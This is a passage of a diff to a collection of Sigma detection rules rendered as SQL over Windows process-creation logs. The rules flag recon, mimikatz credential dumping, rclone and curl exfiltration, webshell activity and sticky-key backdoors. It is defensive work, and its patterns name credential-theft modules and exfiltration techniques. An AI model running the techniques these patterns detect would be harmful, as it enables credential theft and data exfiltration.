"attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1082" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'WMI Commandline Utility' OR OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '%cpu get name%' ESCAPE '\\' OR CommandLine LIKE '%MEMPHYSICAL get MaxCapacity%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get product%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get version%' ESCAPE '\\' OR CommandLine LIKE '%bios get SMBIOSBIOSVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get name%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get DriverVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get VideoModeDescription%' ESCAPE '\\' OR CommandLine LIKE '%OS get Caption,OSArchitecture,Version%' ESCAPE '\\' OR CommandLine LIKE '%DISKDRIVE get Caption%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" + "filename": "proc_creation_win_wmic_recon_system_info_discovery.yml" }, { - "title": "Webshell Detection With Command Line Keywords", - "id": "bed2a484-9348-4143-8a8a-b801c979301c", - "status": "experimental", - "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "title": "PUA - Nmap/Zenmap Execution", + "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "status": "test", + "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unknown" + "Network administrator computer" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\quser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" ], - "filename": "proc_creation_win_webshell_detection.yml" + "filename": "proc_creation_win_pua_nmap_zenmap.yml" }, { "title": "HackTool - GMER Rootkit Detector and Remover Execution", @@ -24633,1656 +24673,1693 @@ "filename": "proc_creation_win_hktl_gmer.yml" }, { - "title": "PowerShell Base64 Encoded WMI Classes", - "id": "1816994b-42e1-4fb1-afd2-134d88184f71", + "title": "PUA - Rclone Execution", + "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", "status": "experimental", - "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"\"...etc.", - "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" + "filename": "proc_creation_win_pua_rclone_execution.yml" }, { - "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", - "id": "37db85d1-b089-490a-a59a-c7b6f984f480", - "status": "test", - "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", - "author": "frack113", + "title": "Gpg4Win Decrypt Files From Suspicious Locations", + "id": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", + "status": "experimental", + "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", + "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1518.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gpg2.exe' ESCAPE '\\' OR Product = 'GNU Privacy Guard (GnuPG)' OR Company = 'g10 Code GmbH') AND CommandLine LIKE '%-passphrase%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" + "filename": "proc_creation_win_gpg4win_susp_usage.yml" }, { - "title": "Potential Recon Activity Via Nltest.EXE", - "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "title": "Procdump Execution", + "id": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", "status": "experimental", - "description": "Detects nltest commands that can be used for information discovery", - "author": "Craig Young, oscd.community, Georg Lauenstein", + "description": "Detects usage of the SysInternals Procdump utility", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1016", - "attack.t1482" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate administration use but user and host must be investigated" + "Legitimate use of procdump by a developer or administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nltest_recon.yml" + "filename": "proc_creation_win_sysinternals_procdump.yml" }, { - "title": "HackTool - Mimikatz Execution", - "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", - "status": "test", - "description": "Detection well-known mimikatz command line arguments", - "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "title": "Potential Russian APT Credential Theft Activity", + "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "status": "stable", + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006" + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" + "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" }, { - "title": "Sticky Key Like Backdoor Execution", - "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", - "status": "test", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "title": "Potential Recon Activity Using Wevtutil", + "id": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", + "status": "experimental", + "description": "Detects usage of the wevtutil utility to perform reconnaissance", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.discovery" ], "falsepositives": [ - "Unlikely" + "Legitimate usage of the utility by administrators to query the event log" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '% qe %' ESCAPE '\\' OR CommandLine LIKE '% query-events %' ESCAPE '\\') AND (CommandLine LIKE '%Microsoft-Windows-TerminalServices-LocalSessionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Security%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" + "filename": "proc_creation_win_wevtutil_recon.yml" }, { - "title": "Suspicious Rundll32 Activity", - "id": "e593cf51-88db-4ee1-b920-37e89012a3c9", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on arguments", - "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", + "title": "RunDLL32 Spawning Explorer", + "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "status": "experimental", + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", + "author": "elhoim, CD_ROM_", "tags": [ "attack.defense_evasion", "attack.t1218.011" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%javascript:%' ESCAPE '\\' AND CommandLine LIKE '%.RegisterXLL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURLA%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%FileProtocolHandler%' ESCAPE '\\') OR (CommandLine LIKE '%zipfldr.dll%' ESCAPE '\\' AND CommandLine LIKE '%RouteTheCall%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%mshtml.dll%' ESCAPE '\\' AND CommandLine LIKE '%PrintHTML%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieframe.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%shdocvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%syssetup.dll%' ESCAPE '\\' AND CommandLine LIKE '%SetupInfObjectInstallAction%' ESCAPE '\\') OR (CommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND CommandLine LIKE '%InstallHinfSection%' ESCAPE '\\') OR (CommandLine LIKE '%pcwutl.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbShortcut%' ESCAPE '\\') OR (CommandLine LIKE '%scrobj.dll%' ESCAPE '\\' AND CommandLine LIKE '%GenerateTypeLib%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%shimgvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%ImageView\\_Fullscreen%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%shell32.dll,Control\\_RunDLL desk.cpl,screensaver,@screensaver%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\rundll32.exe\" Shell32.dll,Control\\_RunDLL \"C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.cpl\",' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_activity.yml" + "filename": "proc_creation_win_rundll32_spawn_explorer.yml" }, { - "title": "Potential Data Exfiltration Activity Via CommandLine Tools", - "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "title": "Mstsc.EXE Execution From Uncommon Parent", + "id": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "status": "experimental", - "description": "Detects the use of various CLI utilities exfiltrating data via web requests", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\CCleanerBrowser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\whale.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe'))" ], - "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" + "filename": "proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" }, { - "title": "Suspicious Registration via cscript.exe", - "id": "28c8f68b-098d-45af-8d43-8089f3e35403", + "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", "status": "experimental", - "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", - "author": "Austin Songer @austinsonger", + "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows 